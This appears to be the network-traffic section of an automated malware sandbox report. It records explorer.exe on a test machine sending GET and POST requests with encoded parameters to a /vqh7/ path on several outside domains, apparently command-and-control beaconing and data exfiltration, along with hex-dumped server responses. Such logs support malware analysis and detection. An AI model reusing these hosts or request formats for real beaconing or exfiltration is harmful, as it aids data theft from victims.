                                                                      Data Ascii: hTb82V=2BUfm1Xa4-YPIq4Ukov59n7mfpFDv6shHQljtPHhE0V92sg68pKAUTShhqcJrI95zznqpHjAtM9z9rL51WhCaCDUOKfuOLyMXfGxkLomDi(DUOEZSvhmt0~vlOeg(x5wt1JaTx~OYbEPObzmxfBddZr7YhAROJzi2rd0OZ56DCs7rYuTRQ).
                                                                      Feb 23, 2023 11:18:44.123210907 CET127INHTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1238
                                                                      date: Thu, 23 Feb 2023 10:18:43 GMT
                                                                      server: LiteSpeed
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                      Feb 23, 2023 11:18:44.123233080 CET127INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                      Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      12192.168.2.44970775.102.22.16880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:18:46.791088104 CET127OUTGET /vqh7/?hTb82V=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcRLjHL7QON+iJA==&ryQDc=vwyb4 HTTP/1.1
                                                                      Host: www.hotelyeah.top
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Feb 23, 2023 11:18:46.910317898 CET129INHTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1238
                                                                      date: Thu, 23 Feb 2023 10:18:46 GMT
                                                                      server: LiteSpeed
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                      Feb 23, 2023 11:18:46.910343885 CET129INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                      Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      13192.168.2.44970891.195.240.11780C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:18:58.143523932 CET131OUTPOST /vqh7/ HTTP/1.1
                                                                      Host: www.nativealternatives.com
                                                                      Connection: close
                                                                      Content-Length: 188
                                                                      Cache-Control: no-cache
                                                                      Origin: http://www.nativealternatives.com
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://www.nativealternatives.com/vqh7/
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Data Raw: 68 54 62 38 32 56 3d 62 59 4e 63 64 36 31 51 74 4a 62 59 57 58 74 68 46 53 72 73 72 49 44 78 38 4c 62 75 35 56 73 73 31 55 72 4f 31 5f 73 4c 6f 72 36 2d 4a 48 79 66 53 71 57 6f 66 4d 62 43 6c 77 6c 7a 76 7a 56 62 66 74 6f 56 76 65 35 47 6e 2d 44 76 7e 50 6e 51 56 71 5a 4c 30 6f 6a 48 70 50 53 4d 39 67 72 70 62 69 6e 72 70 4f 63 38 43 58 7a 77 52 36 76 54 65 72 53 4f 75 68 6a 6c 70 63 62 6a 59 45 66 70 77 49 53 50 4b 4a 58 63 59 55 56 42 30 42 31 45 5a 64 45 4d 66 62 51 30 74 31 78 31 7a 4f 30 72 76 70 34 45 79 42 55 78 62 45 58 6b 30 4e 50 35 77 67 29 2e 00 00 00 00 00 00 00 00
                                                                      Data Ascii: hTb82V=bYNcd61QtJbYWXthFSrsrIDx8Lbu5Vss1UrO1_sLor6-JHyfSqWofMbClwlzvzVbftoVve5Gn-Dv~PnQVqZL0ojHpPSM9grpbinrpOc8CXzwR6vTerSOuhjlpcbjYEfpwISPKJXcYUVB0B1EZdEMfbQ0t1x1zO0rvp4EyBUxbEXk0NP5wg).
                                                                      Feb 23, 2023 11:18:58.162846088 CET131INHTTP/1.1 403 Forbidden
                                                                      date: Thu, 23 Feb 2023 10:18:58 GMT
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      vary: Accept-Encoding
                                                                      server: NginX
                                                                      content-encoding: gzip
                                                                      connection: close
                                                                      Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      14192.168.2.44970991.195.240.11780C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:19:00.693964958 CET132OUTGET /vqh7/?hTb82V=Wal8eNVZj43YUX59PSGdwan825+QwmNgiW2tgvg58tiLWmT3NKzwSJHVqQ8whildXtpelu1/jOeS1tuPF4RPzbvyn9a9+nnCWg==&ryQDc=vwyb4 HTTP/1.1
                                                                      Host: www.nativealternatives.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Feb 23, 2023 11:19:00.746474028 CET133INHTTP/1.1 200 OK
                                                                      date: Thu, 23 Feb 2023 10:19:00 GMT
                                                                      content-type: text/html; charset=UTF-8
                                                                      transfer-encoding: chunked
                                                                      vary: Accept-Encoding
                                                                      x-powered-by: PHP/8.1.9
                                                                      expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                      cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      pragma: no-cache
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_IM9pK1uWsBmpYlTF1suVZ5ErIVYkhePSPWVqaNWD8Vnir3OosGLsOU6BR7/7nX4odMOFQzga/8yCBqHMfqsHbw==
                                                                      last-modified: Thu, 23 Feb 2023 10:19:00 GMT
                                                                      x-cache-miss-from: parking-5544546577-pl6zq
                                                                      server: NginX
                                                                      connection: close
                                                                      Data Raw: 32 43 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 49 4d 39 70 4b 31 75 57 73 42 6d 70 59 6c 54 46 31 73 75 56 5a 35 45 72 49 56 59 6b 68 65 50 53 50 57 56 71 61 4e 57 44 38 56 6e 69 72 33 4f 6f 73 47 4c 73 4f 55 36 42 52 37 2f 37 6e 58 34 6f 64 4d 4f 46 51 7a 67 61 2f 38 79 43 42 71 48 4d 66 71 73 48 62 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6e 61 74 69 76 65 61 6c 74 65 72 6e 61 74 69 76 65 73 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 6e 61 74 69 76 65 61 6c 74 65 72 6e 61 74 69 76 65 73 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 61 74 69 76 65 61 6c 74 65 72 6e 61 74 69 76 65 73 2e 63 6f 6d 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 c3 bc 72 20 61 6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20 61
                                                                      Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_IM9pK1uWsBmpYlTF1suVZ5ErIVYkhePSPWVqaNWD8Vnir3OosGLsOU6BR7/7nX4odMOFQzga/8yCBqHMfqsHbw==><head><meta charset="utf-8"><title>nativealternatives.com&nbsp;-&nbsp;Informationen zum Thema nativealternatives.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="nativealternatives.com ist die beste Quelle fr alle Informationen die Sie suchen. Von a
                                                                      Feb 23, 2023 11:19:00.746519089 CET135INData Raw: 6c 6c 67 65 6d 65 69 6e 65 6e 20 54 68 65 6d 65 6e 20 62 69 73 20 68 69 6e 20 7a 75 20 73 70 65 7a 69 65 6c 6c 65 6e 20 53 61 63 68 76 65 72 68 61 6c 74 65 6e 2c 20 66 69 6e 64 65 6e 20 53 69 65 20 61 75 66 20 6e 61 74 69 76 65 61 6c 74 65 72 6e
                                                                      Data Ascii: llgemeinen Themen bis hin zu speziellen Sachverhalten, finden Sie auf nativealternatives.com alles. Wir ho1062ffen, dass Sie hier das Gesuchte finden!"><link rel="icon" type="image/png" href="//img.sedoparking.com/t
                                                                      Feb 23, 2023 11:19:00.746546984 CET136INData Raw: 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30 2e 35 65 6d 7d 61 75 64 69 6f 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69
                                                                      Data Ascii: ve;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sa
                                                                      Feb 23, 2023 11:19:00.746576071 CET137INData Raw: 75 74 74 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69
                                                                      Data Ascii: utton{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#313131;text-align:center;padding:0 5px}.announc
                                                                      Feb 23, 2023 11:19:00.746604919 CET139INData Raw: 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 69 6d 61 67 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64
                                                                      Data Ascii: display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__
                                                                      Feb 23, 2023 11:19:00.746634007 CET140INData Raw: 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75
                                                                      Data Ascii: .webarchive-block__list-element-link:focus{text-decoration:underline}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.container-buybox
                                                                      Feb 23, 2023 11:19:00.746659040 CET141INData Raw: 73 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e
                                                                      Data Ascii: s__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-p
                                                                      Feb 23, 2023 11:19:00.746686935 CET142INData Raw: 31 35 44 38 0d 0a 63 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d
                                                                      Data Ascii: 15D8ctive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px;margin
                                                                      Feb 23, 2023 11:19:00.746738911 CET143INData Raw: 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c 61 72 67 65 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62
                                                                      Data Ascii: 218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hov
                                                                      Feb 23, 2023 11:19:00.746767998 CET145INData Raw: 73 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e
                                                                      Data Ascii: shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{background-color:#313131;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-ser
                                                                      Feb 23, 2023 11:19:00.765264034 CET146INData Raw: 6d 56 7a 4c 6d 4e 76 62 54 59 7a 5a 6a 63 7a 5a 44 6b 30 59 57 59 30 4e 44 59 7a 4c 6a 55 78 4f 44 6b 32 4d 54 45 78 4a 6e 52 68 63 32 73 39 63 32 56 68 63 6d 4e 6f 4a 6d 52 76 62 57 46 70 62 6a 31 75 59 58 52 70 64 6d 56 68 62 48 52 6c 63 6d 35
                                                                      Data Ascii: mVzLmNvbTYzZjczZDk0YWY0NDYzLjUxODk2MTExJnRhc2s9c2VhcmNoJmRvbWFpbj1uYXRpdmVhbHRlcm5hdGl2ZXMuY29tJmFfaWQ9MSZzZXNzaW9uPVc3Q3J1QVZMeFB4dDA3REM5R3l3JnRyYWNrcXVlcnk9MQ=="},"imprintUrl":false,"contactUsUrl":false,"contentType":5,"t":"content","pus":"


